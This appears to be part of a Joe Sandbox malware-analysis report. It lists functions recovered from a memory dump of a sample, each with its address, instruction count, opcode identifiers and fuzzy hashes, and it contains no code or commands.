                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b34df6808679159bbbb90fb34953c4c9fd8e3ab2270fc4d804b5fb4eb29bb24e
                                              • Instruction ID: 1fe14d7feb93b5deb3efe5d3bb9f864c0730ab002fc484c54530fe8c8084f2ac
                                              • Opcode Fuzzy Hash: b34df6808679159bbbb90fb34953c4c9fd8e3ab2270fc4d804b5fb4eb29bb24e
                                              • Instruction Fuzzy Hash: 46E01272F5981E89BA45BBB4A85A9FDF296DF8A204FD198B5E41DC2083CE18691601C1
                                              Function 00007FFAACCF48C8 Relevance: .0, Instructions: 25COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                              • Instruction ID: dd560116259a8baea828a1463083babe91422310808685602e169f31ee2b0522
                                              • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                              • Instruction Fuzzy Hash: F8D0EC63E0E71998B558EB0474131FC7384DB83238B51D037D14F81482AC0A611A11C9
                                              Function 00007FFAACCFB298 Relevance: .0, Instructions: 25COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                              • Instruction ID: dc325c6def630259965b985a534d6408aa0ad2f6030c6c4587eadbe82706e02a
                                              • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                              • Instruction Fuzzy Hash: 37D01272A4EB09CCB55C6B0474231FC7340DF47139A504137D14F814939E0AB01A01C5
                                              Function 00007FFAACCEE62A Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                              • Instruction ID: c3148b25097379ee3439b2610f9cb516c4f954641e501bf9ff26e20b2c4269b7
                                              • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                              • Instruction Fuzzy Hash: 87D06732A5E9198AB7986B5874032FC73C5EB872B0A50917FE26E815829E0AA41A51C6
                                              Function 00007FFAACCF2EBD Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 132842220615bffb5fca82f762e25a116fa2c4dbcb0de8539e754ddc26b64b12
                                              • Instruction ID: fe1be47c467dd3522b29806689621cc3b52ca339af67e91232b1521be5c4fdfe
                                              • Opcode Fuzzy Hash: 132842220615bffb5fca82f762e25a116fa2c4dbcb0de8539e754ddc26b64b12
                                              • Instruction Fuzzy Hash: 6AD02B22F41A0D4DBB00F774A8065FCB249DFC8109F809472E00DC3083CE18650901C1
                                              Function 00007FFAACD1B490 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88e5a5f7b4e51dbf5b6973412a4160edfcc8aed63a75560eee8495a0083b0211
                                              • Instruction ID: e4db3d27757797f496360007a6a27b727f2031e873254e20bb2ae343bccd42c5
                                              • Opcode Fuzzy Hash: 88e5a5f7b4e51dbf5b6973412a4160edfcc8aed63a75560eee8495a0083b0211
                                              • Instruction Fuzzy Hash: A3D0C220D28F194FEAB8BB3890483A1A1E0FF18304F404AA9D03EC3188DF68E88843C0
                                              Function 00007FFAACCF2E1A Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88885cefaf7588310dd82dea85a50c71c746c43dfe46828d706e95e436786338
                                              • Instruction ID: f2c6057841134ccfcab5512d2f20cb44922e1232ff29c1cfa313f86d137d1488
                                              • Opcode Fuzzy Hash: 88885cefaf7588310dd82dea85a50c71c746c43dfe46828d706e95e436786338
                                              • Instruction Fuzzy Hash: 90C02266E89B06C7F5928648B0411F5F3C0D3A0341F000071900D822C6EC0AF08F81D1
                                              Function 00007FFAACCE08FE Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 645ed11126b96d686b52543281514823b5803d415932a26a5db8f74803ad7304
                                              • Instruction ID: c228edf75d4417776e97bfc33c8e403d751d137f92ada7aa17fe0a6f1c2c3b21
                                              • Opcode Fuzzy Hash: 645ed11126b96d686b52543281514823b5803d415932a26a5db8f74803ad7304
                                              • Instruction Fuzzy Hash: 2ED0127241C7094BC2059F54E4008DAB7A0FB95364F404B79E09E95191DF68968586C1
                                              Function 00007FFAACCFAEE7 Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25600d77628d7ca3f04c9f8b21a02b18bd35151711c7cb8fda305c4747328931
                                              • Instruction ID: 1c88fd68b23a966d7ad0cd6e5f1b35b280c20797062c80d43cedfb9188f99491
                                              • Opcode Fuzzy Hash: 25600d77628d7ca3f04c9f8b21a02b18bd35151711c7cb8fda305c4747328931
                                              • Instruction Fuzzy Hash: 89C02207B0DB8982FA010758A0820E0F780E766114B0841E1E08B51086DC59988A86C2
                                              Function 00007FFAACCF90F0 Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b82696bf141a10739d52a7a9371788067d4825fa2e6ba823c387fc3b7351916
                                              • Instruction ID: b5558ae6c953beb62017e122fde0579cff7d15c018ee8d9836954a77b75ed944
                                              • Opcode Fuzzy Hash: 3b82696bf141a10739d52a7a9371788067d4825fa2e6ba823c387fc3b7351916
                                              • Instruction Fuzzy Hash: A4D0A72192AE4181AA8857280C9302435C0AA56314BA40298E47FC29D1E949C4468282
                                              Function 00007FFAACCE0C57 Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79ee52e89748c08d222dec4a6432f5a819eae2deaf371e5d81f216031fbbf2eb
                                              • Instruction ID: 575be54b858b1f1a87987a10ffc0dc4c7b272c29a483d7c3209a9f7a5a3aed6d
                                              • Opcode Fuzzy Hash: 79ee52e89748c08d222dec4a6432f5a819eae2deaf371e5d81f216031fbbf2eb
                                              • Instruction Fuzzy Hash: 98D01732428B099BD3489F14E44089AB6A0BFD5320F804B69B06E861D1DE6496858682
                                              Function 00007FFAACCF5814 Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e4eac96f9509168aa063dc952b69d212283c63d0c9fb9e6ea986bf018835483
                                              • Instruction ID: 70b98916ba17c022c218c7ed81593115f6fa296a3c517c4427b2933f7a0f3086
                                              • Opcode Fuzzy Hash: 6e4eac96f9509168aa063dc952b69d212283c63d0c9fb9e6ea986bf018835483
                                              • Instruction Fuzzy Hash: F6C09B01F5DB1D4AB5505B9C7C411F85381D7C55387545777D50EC628DCC1DD88502C2
                                              Function 00007FFAACCF5804 Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c3964020956be4e5e4dfdfeffd443e0bd5fbe08c20d4587ae3077e78d377c61
                                              • Instruction ID: 1adaf36a9f12c61669ad9e43ae7ba9b4b64323a9e7d8ef963fb180d450f8d2bb
                                              • Opcode Fuzzy Hash: 8c3964020956be4e5e4dfdfeffd443e0bd5fbe08c20d4587ae3077e78d377c61
                                              • Instruction Fuzzy Hash: EAC09B01F5DB1D4AB5505B9C7C411F85381D7C55787945777D50EC228DDC1DD84902C2
                                              Function 00007FFAACCF57F4 Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51921f8a7d17fdef70aca972a652121e60fe2369b0ef1a98cd50350611cde070
                                              • Instruction ID: 93d7a68d9436606c05d099bbceaef793b4f550e8e633684127be7af670ed0841
                                              • Opcode Fuzzy Hash: 51921f8a7d17fdef70aca972a652121e60fe2369b0ef1a98cd50350611cde070
                                              • Instruction Fuzzy Hash: 16C09B01F5EB1D4EB5505B5C7C411BC5381D7C55397545777D50DC228DCC1DD89501C2
                                              Function 00007FFAACCF3CCA Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c25eb31fa01d3745e88fe877d016a747663ae8508c697e6a05469930d96f5df
                                              • Instruction ID: 8da16819b923793a069524d3f8ea87bacbce955acb6bbd3bcbd933c726c72d6b
                                              • Opcode Fuzzy Hash: 3c25eb31fa01d3745e88fe877d016a747663ae8508c697e6a05469930d96f5df
                                              • Instruction Fuzzy Hash: 45C08052D5970675F6A9576C70456F517C0D790360F488132A01DC135ADC09D08B45C2
                                              Function 00007FFAACCE3F43 Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bc2e0b3f69c96b86151df19b3d6d9a1e3433b455b575165d13121bb2f550983
                                              • Instruction ID: e29b9d3f32fb38703ec1d6b49e76d8f43c2f4d07bd94fb2e5c0b5d20dd199532
                                              • Opcode Fuzzy Hash: 1bc2e0b3f69c96b86151df19b3d6d9a1e3433b455b575165d13121bb2f550983
                                              • Instruction Fuzzy Hash: D4C0123242D54A57D341AB10E441CEB7351BF91210F805F79F05E41095ED58A6448582
                                              Function 00007FFAACCF3F85 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                              • Instruction ID: 4bf21a82ccc292810c154a7f3e422a765bc39c13f9e847333b968bef9dfe77cd
                                              • Opcode Fuzzy Hash: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                              • Instruction Fuzzy Hash: 1DB01237A46109846A2097C474010FDF714D78113AF10C133C30D914008902102941C0
                                              Function 00007FFAACCFA855 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
                                              • Instruction ID: 889fe1c9108e2340e3626437b5763763dd71118ab43f6a6b5802da1b2ec7c87a
                                              • Opcode Fuzzy Hash: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
                                              • Instruction Fuzzy Hash: 50B01233A46109856A104684B4010FDF310D78127BF101173C30D910004646102941D0
                                              Function 00007FFAACCF7710 Relevance: .0, Instructions: 1COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d56aeeabe96a9bb46263d3a0f988bebe56fdf7434a8f7fe359e918bf006637e6
                                              • Instruction ID: fa08bffe082a922341f1fc875be9b0f499b50c4bab7756402b4ea1ec194d7c12
                                              • Opcode Fuzzy Hash: d56aeeabe96a9bb46263d3a0f988bebe56fdf7434a8f7fe359e918bf006637e6
                                              • Instruction Fuzzy Hash:
                                              Function 00007FFAACCF7138 Relevance: .0, Instructions: 1COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e49e51268fecd4c5f7ab787268f50a5c9f395c56cbd8e04683b743c499c84bf
                                              • Instruction ID: b2e4d3eaa8288134de8a7950ff9b572ab9009ababe1d0311ea7c45ff2d45a65a
                                              • Opcode Fuzzy Hash: 1e49e51268fecd4c5f7ab787268f50a5c9f395c56cbd8e04683b743c499c84bf
                                              • Instruction Fuzzy Hash: